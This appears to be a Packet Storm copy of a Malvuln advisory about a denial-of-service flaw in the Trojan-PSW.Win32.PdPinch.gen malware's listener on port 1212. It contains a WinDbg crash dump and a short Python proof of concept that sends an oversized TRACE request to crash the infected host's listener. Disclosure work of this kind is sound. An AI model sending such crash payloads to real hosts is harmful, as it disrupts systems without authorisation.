what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Trojan-PSW.Win32.PdPinch.gen MVID-2021-0358 Denial Of Service

Trojan-PSW.Win32.PdPinch.gen MVID-2021-0358 Denial Of Service
Posted Oct 5, 2021
Authored by malvuln | Site malvuln.com

Trojan-PSW.Win32.PdPinch.gen malware suffers from a denial of service vulnerability.

tags | exploit, denial of service, trojan
systems | windows
SHA-256 | 1341276837a234923cf559d9f5303fc4136e3c08095ae4f7bf77990598809dba

Trojan-PSW.Win32.PdPinch.gen MVID-2021-0358 Denial Of Service

Change Mirror Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/0e4fbfeb6f7a98e437a497013b285ffc.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan-PSW.Win32.PdPinch.gen
Vulnerability: Remote Denial of Service
Description: The malware listens on TCP port 1212. Third-party attackers who can reach infected systems can send a specially crafted junk HTTP request to trigger an access violation and crash.
Type: PE32
MD5: 0e4fbfeb6f7a98e437a497013b285ffc
Vuln ID: MVID-2021-0358
Disclosure: 10/04/2021

Memory Dump:
(dc4c.da68): Access violation - code c0000005 (first/second chance not available)
eax=04ad131c ebx=746d5600 ecx=02620d08 edx=746ed51c esi=00000004 edi=74749290
eip=74744637 esp=04ad0f00 ebp=04ad1304 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206


0:007> .ecxr
eax=04ad131c ebx=746d5600 ecx=02620d08 edx=746ed51c esi=00000004 edi=74749290
eip=74744637 esp=04ad0f00 ebp=04ad1304 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
apphelp!DWM8And16Bit_RestoreDisplayMode_CallOut+0xd2a7:
74744637 56 push esi

0:007> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************

FAULTING_IP:
apphelp!DWM8And16Bit_RestoreDisplayMode_CallOut+d2a7
74744637 56 push esi

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 74744637 (apphelp!DWM8And16Bit_RestoreDisplayMode_CallOut+0x0000d2a7)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 04ad0efc
Attempt to write to address 04ad0efc

PROCESS_NAME: Trojan-PSW.Win32.PdPinch.gen.0e4fbfeb6f7a98e437a497013b285ffc.exe

ADDITIONAL_DEBUG_TEXT:
Use '!findthebuild' command to search for the target build information.
If the build information is available, run '!findthebuild -s ; .reload' to set symbol path and load symbols.

MODULE_NAME: apphelp

FAULTING_MODULE: 77d70000 ntdll

DEBUG_FLR_IMAGE_TIMESTAMP: 5066dc78

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000001

EXCEPTION_PARAMETER2: 04ad0efc

WRITE_ADDRESS: 04ad0efc

FOLLOWUP_IP:
apphelp!DWM8And16Bit_RestoreDisplayMode_CallOut+d2a7
74744637 56 push esi

MOD_LIST: <ANALYSIS/>

CONTEXT: 00010008 -- (.cxr 0x10008)
Unable to read context, HRESULT 0x80004002

FAULTING_THREAD: 0000da68

BUGCHECK_STR: APPLICATION_FAULT_INVALID_STACK_ACCESS_INVALID_POINTER_WRITE_WRONG_SYMBOLS_EXPLOITABLE_EXH

PRIMARY_PROBLEM_CLASS: INVALID_STACK_ACCESS_EXPLOITABLE_EXH

DEFAULT_BUCKET_ID: INVALID_STACK_ACCESS_EXPLOITABLE_EXH

LAST_CONTROL_TRANSFER: from 00000000 to 74744637

STACK_TEXT:
04ad1304 00000000 04ad131c 04ad136c 747414b5 apphelp!DWM8And16Bit_RestoreDisplayMode_CallOut+0xd2a7


SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: apphelp!DWM8And16Bit_RestoreDisplayMode_CallOut+d2a7

FOLLOWUP_NAME: MachineOwner

IMAGE_NAME: apphelp.dll

STACK_COMMAND: .cxr 0x10008 ; kb

BUCKET_ID: WRONG_SYMBOLS

FAILURE_BUCKET_ID: INVALID_STACK_ACCESS_EXPLOITABLE_EXH_c0000005_apphelp.dll!DWM8And16Bit_RestoreDisplayMode_CallOut

Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=1212

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
PAYLOAD=TRACE / "A"*3073 HTTP/1.1 Host: 0ZYST;onoGij=F9rX2\r\nContent-MD5: "A"*3073\r\n\r\n
s.send(PAYLOAD)
s.close()


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    8 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    7 Files
  • 29
    Oct 29th
    17 Files
  • 30
    Oct 30th
    39 Files
  • 31
    Oct 31st
    17 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close